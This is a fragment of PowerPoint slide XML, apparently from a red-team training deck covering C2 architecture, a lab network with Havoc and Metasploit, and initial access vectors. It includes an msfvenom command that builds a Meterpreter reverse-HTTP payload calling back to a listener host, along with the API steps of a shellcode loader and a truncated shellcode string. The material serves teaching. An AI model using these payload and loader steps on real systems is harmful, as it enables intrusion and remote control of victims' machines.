            <a:ext cx="615874" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RDP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C17EBF9-0DBE-24D6-6130-84EC157E2F30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="10" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692105" y="308919"/>
            <a:ext cx="9827" cy="836138"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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4D027286-7F16-507C-4586-B03DCF61BD22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768080" y="332683"/>
            <a:ext cx="2160271" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>HTTP to Guacamole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0CED628-5137-35B1-2F21-112A4FEBD438}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781049" y="974521"/>
            <a:ext cx="10636594" cy="9299"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="31750">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>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0B9D060C-1319-3972-FF7D-05F1559CEE4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10553304" y="1216704"/>
            <a:ext cx="864339" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>AZURE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D2934E5-02D5-6E6B-BE89-D0B1AEFF5D1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10491520" y="284270"/>
            <a:ext cx="1188146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>INTERNET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E1B51EC-0B71-C72D-B9D8-24ADD54568CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6991354" y="6061160"/>
            <a:ext cx="2182695" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>Winlogbeat (SYSMON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{097F00B2-C954-D612-FE0D-2B15E139220B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606833" y="6054467"/>
            <a:ext cx="2182695" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>SSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>RDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>HAVOC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="1200"/>
              <a:t>METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14702174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50E000-D2D4-A741-D5DA-620F54858E4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D3C68EF-18E4-8346-27D2-90A736C9ABFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166255" y="219154"/>
            <a:ext cx="11720945" cy="634034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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA83F89-1A4D-601A-332A-A5553C7F7A19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="902708"/>
            <a:ext cx="7772400" cy="5052583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31160563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A3E9F-8BF6-9FD0-9063-51868E91577D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>C2 Archtitecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{649A8F84-7E97-EE50-3CFD-9E3B0DC59D1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Team Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>(Redirectors)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Operator Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Listeners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Payload (EXE, PWSH, Shellcode …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Staged/Stageless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31041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75761-3E29-EBE5-5C03-BDEBADC9FF8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Generate shellcode (requires loader)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49294C1C-A7C6-575E-01D1-578FBC053D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="949106"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>msfvenom -p windows/meterpreter/reverse_http LHOST=10.0.0.4 LPORT=80 -f csharp -o msf.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC528F1-1A40-9C62-1479-7F6FC640220A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="728978" y="2774731"/>
            <a:ext cx="7772400" cy="3287419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3930875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EB6BA-66C8-A501-7821-306AF409DBC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Custom Local Shellcode Loader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5D8256-0920-1DD5-09DA-3DFEF0DA75E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24429766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ABD6-7828-52DA-270A-5A9200709BC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Most common initial access vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{277A1086-2C4B-A676-E341-BD4EF723F641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>VPN compromise (phished credentials)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Mail delivery (documents, links etc…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Vulnerable exposed services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="946056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87EAACE-45B5-B542-5532-E0ECDA9D1702}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556951" y="1136821"/>
            <a:ext cx="4967417" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Obtain a Handle -&gt; GetCurrentProcess()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D51E024B-EA6B-E084-2C3B-90738C5821C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="1861757"/>
            <a:ext cx="4967417" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>AllocateMemory-&gt; VirtualAlloc()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE">
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PAGE_EXECUTE_READWRITE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A30B39E5-CDDD-5C69-8472-55C7AA704E86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556949" y="2844463"/>
            <a:ext cx="7445383" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Write Shellcode-&gt; WriteProcessMemory()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"\xfc\x48\x83\xe4\xf0\xe8\...&lt;SNIP&gt;…\xc0\x00\x00\x00\x41\x51"</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7EF063C-AED4-1BC2-FCDE-6F5EAEB6D283}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="3787404"/>
            <a:ext cx="4967417" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Execute -&gt; CreateThread()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Down Arrow 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC2BAEA4-DE52-48EA-E9B1-095B2C5AB624}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273643" y="150615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DC151321-46C0-5DFE-7212-C61A7B0CDBA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273643" y="2508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AF31A224-7B75-4559-F478-577B03995556}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273644" y="3431800"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="526137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28B4A6-8E01-E3BE-A03D-8AD8C2843C6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9EB73CC-4DC9-EB24-C9BE-E1F7AD11FB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556951" y="1973947"/>
            <a:ext cx="4967417" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-BE">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>kernel32!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>VirtualAlloc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D74833-3359-5E5E-8E85-BF7A1F785221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="2698883"/>
            <a:ext cx="4967417" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-BE">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>kernelbase!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>VirtualAlloc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE8B7E04-F5EC-AA41-F91D-CA78A69537B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="3681589"/>
            <a:ext cx="4967416" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-BE">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>kernelbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>!VirtualAllocInternal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A3B3E1-7B4F-405E-3F9D-AA5408339524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556950" y="4624530"/>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ntdll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-webkit-standard"/>
              </a:rPr>
              <a:t>!NtAllocateVirtualMemory -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
